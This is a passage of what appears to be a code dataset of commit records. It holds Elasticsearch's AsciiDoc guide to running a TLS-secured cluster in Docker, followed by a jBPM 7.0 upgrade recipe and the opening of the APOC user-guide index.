Copy and paste the\ncontents of each example into the appropriate file as described in the\nfollowing sections:\n\n* <<docker-instances-yml,`instances.yml`>>\n* <<docker-env,`.env`>>\n* <<docker-create-certs,`create-certs.yml`>>\n* <<docker-docker-compose,`docker-compose.yml`>>\n\n[[docker-instances-yml]]\n[discrete]\n===== `instances.yml`\n\nWhen you run the example, {es} uses this file to create a three-node cluster.\nThe nodes are named `es01`, `es02`, and `es03`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::instances.yml[]\n----\nendif::[]\n\n[[docker-env]]\n[discrete]\n===== `.env`\n\nThe `.env` file sets environment variables that are used when you run the\nexample. Ensure that you specify a strong password for the `elastic` user with\nthe `ELASTIC_PASSWORD` variable. This variable is referenced by the\n`docker-compose.yml` file.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::.env[]\n----\nendif::[]\n\n`COMPOSE_PROJECT_NAME`:: Adds an `es_` prefix for all volumes and networks\ncreated by `docker-compose`.\n\n`CERTS_DIR`:: Specifies the path inside the Docker image where {es} expects the\nsecurity certificates.\n\n`ELASTIC_PASSWORD`:: Sets the initial password for the `elastic` user.\n\n[discrete]\n[[docker-create-certs]]\n===== `create-certs.yml`\n\nThe `create-certs.yml` file includes a script that generates node certificates\nand a certificate authority (CA) certificate and key where {es} expects them.\nThese certificates and key are placed in a Docker volume named `es_certs`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::create-certs.yml[]\n----\nendif::[]\n\n[[docker-docker-compose]]\n[discrete]\n===== `docker-compose.yml`\n\nThe `docker-compose.yml` file defines configuration settings for each of your\n{es} nodes.\n\nNOTE: This sample `docker-compose.yml` file uses the `ES_JAVA_OPTS`\nenvironment variable to manually set the heap size to 512MB. We do not recommend\nusing `ES_JAVA_OPTS` in production.\nSee <<docker-set-heap-size,manually set the heap size>>.\n\nThis configuration exposes port `9200` on all network interfaces. Given how\nDocker manipulates `iptables` on Linux, this means that your {es} cluster is\npublicly accessible, potentially ignoring any firewall settings. If you don't\nwant to expose port `9200` and instead use a reverse proxy, replace `9200:9200`\nwith `127.0.0.1:9200:9200` in the `docker-compose.yml` file. 
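For example, the `ports` entry of a node's service definition would then read (sketch):\n\n[source,yaml]\n----\nports:\n - \"127.0.0.1:9200:9200\"\n----\n\n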
{es} will then only\nbe accessible from the host machine itself.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::docker-compose.yml[]\n----\nendif::[]\n\n===== Start your cluster with security enabled and configured\n\nThis sample Docker Compose file starts a three-node {es} cluster.\n\nThe https:\/\/docs.docker.com\/storage\/volumes[Docker named volumes]\n`data01`, `data02`, and `data03` store the node data directories so that the\ndata persists across restarts. If they don't already exist, running\n`docker-compose` creates these volumes.\n\n[[docker-generate-certificates]]\n. Generate the certificates. You only need to run this command one time:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml run --rm create_certs\n----\n\n. Start your {es} nodes with TLS configured on the transport layer:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n+\nNode `es01` listens on `localhost:9200` and `es02` and `es03` talk to `es01`\nover a Docker network.\n\n. Access the {es} API over TLS using the bootstrapped password for the `elastic`\nuser that you specified in the `.env` file:\n+\n[\"source\",\"sh\",subs=\"attributes\"]\n----\ndocker run --rm -v es_certs:\/certs --network=es_default {docker-image} curl --cacert \/certs\/ca\/ca.crt -u elastic:<password> https:\/\/es01:9200\n----\n\/\/ NOTCONSOLE\n+\n--\n`es_certs`:: The name of the volume that the script in `create-certs.yml`\ncreates to hold your certificates.\n\n`<password>`:: The password for the `elastic` user, defined by the\n`ELASTIC_PASSWORD` variable in the `.env` file.\n--\n\n. Submit a `_cat\/nodes` request to check that the nodes are up and running:\n+\n[source,sh]\n----\ncurl -X GET \"https:\/\/localhost:9200\/_cat\/nodes?v=true&pretty\"\n----\n\/\/ NOTCONSOLE\n\nLog messages go to the console and are handled by the configured Docker logging\ndriver. By default, you can access logs with `docker logs`. If you prefer that\nthe {es} container write logs to disk, set the `ES_LOG_STYLE` environment\nvariable to `file`. This causes {es} to use the same logging configuration as\nother {es} distribution formats.\n\nIf you need to generate a new password for the `elastic` user or any of the\nbuilt-in users, use the `elasticsearch-reset-password` tool:\n\nWARNING: Windows users not running PowerShell must remove all backslashes (`\\\\`)\nand join lines in the following command.\n\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/elasticsearch-reset-password \\\\\nauto --batch \\\\\n--url https:\/\/localhost:9200\"\n----\n\n===== Stop the cluster\nTo stop the cluster, run `docker-compose down`. The data in the Docker volumes\nis preserved and loaded when you restart the cluster with `docker-compose up`.\n\n[\"source\",\"sh\"]\n----\ndocker-compose down\n----\n\nTo **delete the data volumes** when you stop the cluster, specify the `-v`\noption:\n\n[\"source\",\"sh\"]\n----\ndocker-compose down -v\n----\n\nWARNING: Deleting data volumes will remove the generated security certificates\nfor your nodes. You will need to run `docker-compose` and \n<<docker-generate-certificates,regenerate the security certificates>> before\nstarting your cluster.\n\n===== Next steps\n\nYou now have a test {es} environment set up. 
Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[docker-prod-prerequisites]]\n==== Using the Docker images in production\n\nThe following requirements and recommendations apply when running {es} in Docker in production.\n\n===== Set `vm.max_map_count` to at least `262144`\n\nThe `vm.max_map_count` kernel setting must be set to at least `262144` for production use.\n\nHow you set `vm.max_map_count` depends on your platform:\n\n* Linux\n+\n--\nThe `vm.max_map_count` setting should be set permanently in `\/etc\/sysctl.conf`:\n[source,sh]\n--------------------------------------------\ngrep vm.max_map_count \/etc\/sysctl.conf\nvm.max_map_count=262144\n--------------------------------------------\n\nTo apply the setting on a live system, run:\n\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* macOS with https:\/\/docs.docker.com\/docker-for-mac[Docker for Mac]\n+\n--\nThe `vm.max_map_count` setting must be set within the xhyve virtual machine:\n\n. From the command line, run:\n+\n[source,sh]\n--------------------------------------------\nscreen ~\/Library\/Containers\/com.docker.docker\/Data\/vms\/0\/tty\n--------------------------------------------\n\n. Press enter and use `sysctl` to configure `vm.max_map_count`:\n+\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n\n. To exit the `screen` session, type `Ctrl a d`.\n--\n\n* Windows and macOS with https:\/\/www.docker.com\/products\/docker-desktop[Docker Desktop]\n+\n--\nThe `vm.max_map_count` setting must be set via docker-machine:\n\n[source,sh]\n--------------------------------------------\ndocker-machine ssh\nsudo sysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* Windows with https:\/\/docs.docker.com\/docker-for-windows\/wsl[Docker Desktop WSL 2 backend]\n+\n--\nThe `vm.max_map_count` setting must be set in the docker-desktop container:\n\n[source,sh]\n--------------------------------------------\nwsl -d docker-desktop\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n===== Configuration files must be readable by the `elasticsearch` user\n\nBy default, {es} runs inside the container as user `elasticsearch` using\nuid:gid `1000:0`.\n\nIMPORTANT: One exception is https:\/\/docs.openshift.com\/container-platform\/3.6\/creating_images\/guidelines.html#openshift-specific-guidelines[OpenShift],\nwhich runs containers using an arbitrarily assigned user ID.\nOpenShift presents persistent volumes with the gid set to `0`, which works without any adjustments.\n\nIf you are bind-mounting a local directory or file, it must be readable by the `elasticsearch` user.\nIn addition, this user must have write access to the <<path-settings,config, data and log dirs>>\n({es} needs write access to the `config` directory so that it can generate a keystore).\nA good strategy is to grant group access to gid `0` for the local directory.\n\nFor example, to prepare a local directory for storing data through a bind-mount:\n\n[source,sh]\n--------------------------------------------\nmkdir esdatadir\nchmod g+rwx esdatadir\nchgrp 0 esdatadir\n--------------------------------------------\n\nYou can also run an {es} container using both a custom UID and GID. 
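For example, a minimal sketch (the uid:gid `1002:1002` is hypothetical; it only needs to own the bind-mounted directory, and `--group-add 0` is explained next):\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\ndocker run --user 1002:1002 --group-add 0 -v full_path_to\/esdatadir:\/usr\/share\/elasticsearch\/data {docker-image}\n--------------------------------------------\n\n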
Unless you\nbind-mount each of the `config`, `data` and `logs` directories, you must pass\nthe command line option `--group-add 0` to `docker run`. This ensures that the user\nunder which {es} is running is also a member of the `root` (GID 0) group inside the\ncontainer.\n\n===== Increase ulimits for nofile and nproc\n\nIncreased ulimits for <<setting-system-settings,nofile>> and <<max-number-threads-check,nproc>>\nmust be available for the {es} containers.\nVerify that the https:\/\/github.com\/moby\/moby\/tree\/ea4d1243953e6b652082305a9c3cda8656edab26\/contrib\/init[init system]\nfor the Docker daemon sets them to acceptable values.\n\nTo check the Docker daemon defaults for ulimits, run:\n\n[source,sh]\n--------------------------------------------\ndocker run --rm centos:8 \/bin\/bash -c 'ulimit -Hn && ulimit -Sn && ulimit -Hu && ulimit -Su'\n--------------------------------------------\n\nIf needed, adjust them in the Daemon or override them per container.\nFor example, when using `docker run`, set:\n\n[source,sh]\n--------------------------------------------\n--ulimit nofile=65535:65535\n--------------------------------------------\n\n===== Disable swapping\n\nSwapping needs to be disabled for performance and node stability.\nFor information about ways to do this, see <<setup-configuration-memory>>.\n\nIf you opt for the `bootstrap.memory_lock: true` approach,\nyou also need to define the `memlock: true` ulimit in the\nhttps:\/\/docs.docker.com\/engine\/reference\/commandline\/dockerd\/#default-ulimits[Docker Daemon],\nor explicitly set for the container as shown in the <<docker-compose-file, sample compose file>>.\nWhen using `docker run`, you can specify:\n\n[source,sh]\n----\n-e \"bootstrap.memory_lock=true\" --ulimit memlock=-1:-1\n----\n\n===== Randomize published ports\n\nThe image https:\/\/docs.docker.com\/engine\/reference\/builder\/#\/expose[exposes]\nTCP ports 9200 and 9300. For production clusters, randomizing the\npublished ports with `--publish-all` is recommended,\nunless you are pinning one container per host.\n\n[[docker-set-heap-size]]\n===== Manually set the heap size\n\nBy default, {es} automatically sizes JVM heap based on a node's\n<<node-roles,roles>> and the total memory available to the node's container. We\nrecommend this default sizing for most production environments. If needed, you\ncan override default sizing by manually setting JVM heap size.\n\nTo manually set the heap size in production, bind mount a <<set-jvm-options,JVM\noptions>> file under `\/usr\/share\/elasticsearch\/config\/jvm.options.d` that\nincludes your desired <<set-jvm-heap-size,heap size>> settings.\n\nFor testing, you can also manually set the heap size using the `ES_JAVA_OPTS`\nenvironment variable. For example, to use 16GB, specify `-e\nES_JAVA_OPTS=\"-Xms16g -Xmx16g\"` with `docker run`. The `ES_JAVA_OPTS` variable\noverrides all other JVM options. We do not recommend using `ES_JAVA_OPTS` in production. The\n`docker-compose.yml` file above sets the heap size to 512MB.\n\n\n===== Pin deployments to a specific image version\n\nPin your deployments to a specific version of the {es} Docker image. For\nexample +docker.elastic.co\/elasticsearch\/elasticsearch:{version}+.\n\n===== Always bind data volumes\n\nYou should use a volume bound on `\/usr\/share\/elasticsearch\/data` for the following reasons:\n\n. The data of your {es} node won't be lost if the container is killed\n\n. 
{es} is I\/O sensitive and the Docker storage driver is not ideal for fast I\/O\n\n. It allows the use of advanced\nhttps:\/\/docs.docker.com\/engine\/extend\/plugins\/#volume-plugins[Docker volume plugins]\n\n===== Avoid using `loop-lvm` mode\n\nIf you are using the devicemapper storage driver, do not use the default `loop-lvm` mode.\nConfigure docker-engine to use\nhttps:\/\/docs.docker.com\/engine\/userguide\/storagedriver\/device-mapper-driver\/#configure-docker-with-devicemapper[direct-lvm].\n\n===== Centralize your logs\n\nConsider centralizing your logs by using a different\nhttps:\/\/docs.docker.com\/engine\/admin\/logging\/overview\/[logging driver]. Also\nnote that the default json-file logging driver is not ideally suited for\nproduction use.\n\n[[docker-configuration-methods]]\n==== Configuring {es} with Docker\n\nWhen you run in Docker, the <<config-files-location,{es} configuration files>> are loaded from\n`\/usr\/share\/elasticsearch\/config\/`.\n\nTo use custom configuration files, you <<docker-config-bind-mount, bind-mount the files>>\nover the configuration files in the image.\n\nYou can set individual {es} configuration parameters using Docker environment variables.\nThe <<docker-compose-file, sample compose file>> and the\n<<docker-cli-run-dev-mode, single-node example>> use this method. You can\nuse the setting name directly as the environment variable name. If\nyou cannot do this, for example because your orchestration platform forbids\nperiods in environment variable names, then you can use an alternative\nstyle by converting the setting name as follows.\n\n. Change the setting name to uppercase\n. Prefix it with `ES_SETTING_`\n. Escape any underscores (`_`) by duplicating them\n. Convert all periods (`.`) to underscores (`_`)\n\nFor example, `-e bootstrap.memory_lock=true` becomes\n`-e ES_SETTING_BOOTSTRAP_MEMORY__LOCK=true`.\n\nYou can use the contents of a file to set the value of the\n`ELASTIC_PASSWORD` or `KEYSTORE_PASSWORD` environment variables, by\nsuffixing the environment variable name with `_FILE`. This is useful for\npassing secrets such as passwords to {es} without specifying them directly.\n\nFor example, to set the {es} bootstrap password from a file, you can bind mount the\nfile and set the `ELASTIC_PASSWORD_FILE` environment variable to the mount location.\nIf you mount the password file to `\/run\/secrets\/bootstrapPassword.txt`, specify:\n\n[source,sh]\n--------------------------------------------\n-e ELASTIC_PASSWORD_FILE=\/run\/secrets\/bootstrapPassword.txt\n--------------------------------------------\n\nYou can override the default command for the image to pass {es} configuration\nparameters as command line options. 
For example:\n\n[source,sh]\n--------------------------------------------\ndocker run <various parameters> bin\/elasticsearch -Ecluster.name=mynewclustername\n--------------------------------------------\n\nWhile bind-mounting your configuration files is usually the preferred method in production,\nyou can also <<_c_customized_image, create a custom Docker image>>\nthat contains your configuration.\n\n[[docker-config-bind-mount]]\n===== Mounting {es} configuration files\n\nCreate custom config files and bind-mount them over the corresponding files in the Docker image.\nFor example, to bind-mount `custom_elasticsearch.yml` with `docker run`, specify:\n\n[source,sh]\n--------------------------------------------\n-v full_path_to\/custom_elasticsearch.yml:\/usr\/share\/elasticsearch\/config\/elasticsearch.yml\n--------------------------------------------\n\nIMPORTANT: The container **runs {es} as user `elasticsearch` using\nuid:gid `1000:0`**. Bind mounted host directories and files must be accessible by this user,\nand the data and log directories must be writable by this user.\n\n[[docker-keystore-bind-mount]]\n===== Create an encrypted {es} keystore\n\nBy default, {es} will auto-generate a keystore file for <<secure-settings,secure\nsettings>>. This file is obfuscated but not encrypted.\n\nTo encrypt your secure settings with a password and have them persist outside\nthe container, use a `docker run` command to manually create the keystore\ninstead. The command must:\n\n* Bind-mount the `config` directory. The command will create an\n `elasticsearch.keystore` file in this directory. To avoid errors, do\n not directly bind-mount the `elasticsearch.keystore` file.\n* Use the `elasticsearch-keystore` tool with the `create -p` option. You'll be\n prompted to enter a password for the keystore.\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\nFor example:\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore create -p\n----\n\nYou can also use a `docker run` command to add or update secure settings in the\nkeystore. You'll be prompted to enter the setting values. If the keystore is\nencrypted, you'll also be prompted to enter the keystore password.\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore \\\nadd my.secure.setting \\\nmy.other.secure.setting\n----\nendif::[]\n\nIf you've already created the keystore and don't need to update it, you can\nbind-mount the `elasticsearch.keystore` file directly. You can use the\n`KEYSTORE_PASSWORD` environment variable to provide the keystore password to the\ncontainer at startup. For example, a `docker run` command might have the\nfollowing options:\n\n[source,sh]\n----\n-v full_path_to\/config\/elasticsearch.keystore:\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\n-e KEYSTORE_PASSWORD=mypassword\n----\n\n[[_c_customized_image]]\n===== Using custom Docker images\nIn some environments, it might make more sense to prepare a custom image that contains\nyour configuration. 
A `Dockerfile` to achieve this might be as simple as:\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --chown=elasticsearch:elasticsearch elasticsearch.yml \/usr\/share\/elasticsearch\/config\/\n--------------------------------------------\n\nYou could then build and run the image with:\n\n[source,sh]\n--------------------------------------------\ndocker build --tag=elasticsearch-custom .\ndocker run -ti -v \/usr\/share\/elasticsearch\/data elasticsearch-custom\n--------------------------------------------\n\nSome plugins require additional security permissions.\nYou must explicitly accept them either by:\n\n* Attaching a `tty` when you run the Docker image and allowing the permissions when prompted.\n* Inspecting the security permissions and accepting them (if appropriate) by adding the `--batch` flag to the plugin install command.\n\nSee {plugins}\/_other_command_line_parameters.html[Plugin management]\nfor more information.\n\nThe {es} Docker image only includes what is required to run {es}, and does\nnot provide a package manager. It is possible to add additional utilities\nwith a multi-stage Docker build. You must also copy any dependencies, for\nexample shared libraries.\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM centos:8 AS builder\nRUN yum install -y some-package\n\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --from=builder \/usr\/bin\/some-utility \/usr\/bin\/\nCOPY --from=builder \/usr\/lib\/some-lib.so \/usr\/lib\/\n--------------------------------------------\n\nYou should use `centos:8` as a base in order to avoid incompatibilities.\nUse http:\/\/man7.org\/linux\/man-pages\/man1\/ldd.1.html[`ldd`] to list the\nshared libraries required by a utility.\n\n[discrete]\n[[troubleshoot-docker-errors]]\n==== Troubleshoot Docker errors for {es}\n\nHere\u2019s how to resolve common errors when running {es} with Docker.\n\n===== elasticsearch.keystore is a directory\n\n[source,txt]\n----\nException in thread \"main\" org.elasticsearch.bootstrap.BootstrapException: java.io.IOException: Is a directory: SimpleFSIndexInput(path=\"\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\") Likely root cause: java.io.IOException: Is a directory\n----\n\nA <<docker-keystore-bind-mount,keystore-related>> `docker run` command attempted\nto directly bind-mount an `elasticsearch.keystore` file that doesn't exist. If\nyou use the `-v` or `--volume` flag to mount a file that doesn't exist, Docker\ninstead creates a directory with the same name.\n\nTo resolve this error:\n\n. Delete the `elasticsearch.keystore` directory in the `config` directory.\n. Update the `-v` or `--volume` flag to point to the `config` directory path\n rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. Retry the command.\n\n===== elasticsearch.keystore: Device or resource busy\n\n[source,txt]\n----\nException in thread \"main\" java.nio.file.FileSystemException: \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore.tmp -> \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore: Device or resource busy\n----\n\nA `docker run` command attempted to <<docker-keystore-bind-mount,update the\nkeystore>> while directly bind-mounting the `elasticsearch.keystore` file. 
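For example, a combination like this hypothetical one triggers the error:\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config\/elasticsearch.keystore:\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore add my.secure.setting\n----\n\n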
To\nupdate the keystore, the container requires access to other files in the\n`config` directory, such as `keystore.tmp`.\n\nTo resolve this error:\n\n. Update the `-v` or `--volume` flag to point to the `config` directory\n path rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. Retry the command.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"922a3c7b520bc3a28560674647223ae7fc9bc557","subject":"[GUVNOR-2889] kie-wb WARs renamed (#27)","message":"[GUVNOR-2889] kie-wb WARs renamed (#27)\n\n","repos":"droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website","old_file":"download\/upgradeRecipe\/upgradeRecipe7.0.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe7.0.adoc","new_contents":"= Upgrade recipe 7.0\n:awestruct-description: Upgrade to jBPM 7.0 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7.0\n\n== Backwards incompatible changes to the public API\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nOur current intention is to keep these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and not to introduce any additional ones after 7.0.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n== From 6.5.0.Final to 7.0.0.Final\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n=== singleResult flag removed from QueryFilter\n\n`org.kie.internal.query.QueryFilter` does not offer an option for retrieving a single result anymore.\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== KIE Workbench WARs renamed\nThe KIE Workbench WARs were renamed from `kie-wb-distribution-wars-<version>-<container>.war`\nto just `kie-wb-<version>-<container>.war`. 
In case you depend directly on the Maven GAV you need to change\nthe `artifactId`:\n\nBefore in `pom.xml`:\n[source, xml]\n----\n<dependency>\n <groupId>org.kie<\/groupId>\n <artifactId>kie-wb-distribution-wars<\/artifactId>\n <version>6.5.0.Final<\/version>\n <type>war<\/type>\n <classifier>wildfly10<\/classifier>\n<\/dependency>\n----\n\nAfter in `pom.xml`:\n[source, xml]\n----\n<dependency>\n <groupId>org.kie<\/groupId>\n <artifactId>kie-wb<\/artifactId>\n <version>7.0.0.Final<\/version>\n <type>war<\/type>\n <classifier>wildfly10<\/classifier>\n<\/dependency>\n----","old_contents":"= Upgrade recipe 7.0\n:awestruct-description: Upgrade to jBPM 7.0 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7.0\n\n== Backwards incompatible changes to the public API\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nOur current intention is to keep these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and do not introduce any additional ones after 7.0.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n== From 6.5.0.Final to 7.0.0.Beta2\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n=== singleResult flag removed from QueryFilter\n\norg.kie.internal.query.QueryFilter does not offer an option for retrieving a single result anymore.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5eb739ff6855da6bca949046f43e78a81e055215","subject":"Moved manual installation instructions in docs","message":"Moved manual installation instructions in docs\n","repos":"larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"= APOC User Guide {apoc-release}\n:toc: left\n:experimental:\n:sectid:\n:sectlinks:\n:toclevels: 3\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/img\n:script: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/script\n\n== Introduction\n\nNOTE: Go here for documentation for APOC for Neo4j version link:index30.html[3.0.x] link:index31.html[3.1.x] link:index32.html[3.2.x] link:index33.html[3.3.x]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=intro,leveloffset=1]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/b1Yr2nHNS4M\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=signature,leveloffset=1]\n\n== Help and Usage\n\ninclude::overview.adoc[tags=help,leveloffset=-1]\n\nTo generate the help output, apoc utilizes the built in `dbms.procedures()` and `dbms.functions()` utilities.\n\n== 
Installation in Neo4j Server & Docker\n\ninclude::..\/readme.adoc[tags=install,leveloffset=1]\n\ninclude::..\/readme.adoc[tags=warnings,leveloffset=0]\n\ninclude::..\/readme.adoc[tags=docker,leveloffset=0]\n\n\n\/\/ include::overview.adoc[tags=overview,leveloffset=1]\n\n== Overview of APOC Procedures & Functions\n\n[[table-all]]\n[separator=\u00a6,opts=header]\n|===\ninclude::..\/build\/generated-documentation\/documentation.csv[]\n|===\n\ninclude::functions.adoc[leveloffset=+1]\n\n== Text and Lookup Indexes\n\n=== Index Queries\n\nProcedures to add to and query manual indexes\n\nNOTE: Please note that there are (case-sensitive) http:\/\/neo4j.com\/docs\/developer-manual\/current\/#cypher-schema[automatic schema indexes], for equality, non-equality, existence, range queries, starts with, ends-with and contains!\n\n[separator=\u00a6,opts=header,cols=\"1,1m,5\"]\n|===\ninclude::..\/build\/generated-documentation\/apoc.index.csv[]\n|===\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| apoc.index.addAllNodes('index-name',{label1:['prop1',...],...}, {options}) | add all nodes to this full text index with the given fields, additionally populates a 'search' index field with all of them in one place\n| apoc.index.addNode(node,['prop1',...]) | add node to an index for each label it has\n| apoc.index.addNodeByLabel('Label',node,['prop1',...]) | add node to an index for the given label\n| apoc.index.addNodeByName('name',node,['prop1',...]) | add node to an index for the given name\n| apoc.index.addRelationship(rel,['prop1',...]) | add relationship to an index for its type\n| apoc.index.addRelationshipByName('name',rel,['prop1',...]) | add relationship to an index for the given name\n| apoc.index.removeNodeByName('name',node) remove node from an index for the given name\n| apoc.index.removeRelationshipByName('name',rel) remove relationship from an index for the given name\n|===\n\/\/\/\/\n\nimage::{img}\/apoc.index.nodes-with-score.jpg[width=600]\n\n\/\/\/\/\n\n[cols=\"1m,5\"]\n|===\n| apoc.index.search('index-name', 'query') YIELD node, weight | search for the first 100 nodes in the given full text index matching the given lucene query returned by relevance\n| apoc.index.nodes('Label','prop:value*') YIELD node, weight | lucene query on node index with the given label name\n| apoc.index.relationships('TYPE','prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name\n| apoc.index.between(node1,'TYPE',node2,'prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name bound by either or both sides (each node parameter can be null)\n| apoc.index.out(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *outgoing* relationship of the given node, *returns end-nodes*\n| apoc.index.in(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *incoming* relationship of the given node, *returns start-nodes*\n|===\n\/\/\/\/\n\n=== Index Management\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| CALL apoc.index.list() YIELD type,name,config | lists all manual indexes\n| CALL apoc.index.remove('name') YIELD type,name,config | removes manual indexes\n| CALL apoc.index.forNodes('name',{config}) YIELD type,name,config | gets or creates manual node index\n| CALL apoc.index.forRelationships('name',{config}) YIELD type,name,config | gets or creates manual relationship index\n|===\n\/\/\/\/\n\n.Add node to index example\n[source,cypher]\n----\nmatch (p:Person) 
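\n\/\/ add every Person node to the index for its label, using the name and age properties\n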
call apoc.index.addNode(p,[\"name\",\"age\"]) RETURN count(*);\n\/\/ 129s for 1M People\ncall apoc.index.nodes('Person','name:name100*') YIELD node, weight return * limit 2\n----\n\n\/\/ include::overview.adoc[tags=fulltext]\n\ninclude::manual-indexes.adoc[leveloffset=2]\n\ninclude::fulltext.adoc[leveloffset=2]\n\n== Utility Functions\n\ninclude::phonetic.adoc[leveloffset=2]\ninclude::extract.adoc[leveloffset=2]\n\ninclude::ttl.adoc[leveloffset=2]\n\ninclude::datetime.adoc[leveloffset=2]\n\ninclude::number.adoc[leveloffset=2]\n\ninclude::exact.adoc[leveloffset=2]\n\ninclude::diff.adoc[leveloffset=2]\n\n== Graph Algorithms\n\ninclude::algo.adoc[leveloffset=2]\ninclude::expand.adoc[leveloffset=2]\ninclude::centrality.adoc[leveloffset=2]\ninclude::pagerank.adoc[leveloffset=2]\n\n== Spatial\n\ninclude::spatial.adoc[leveloffset=2]\n\n== Data 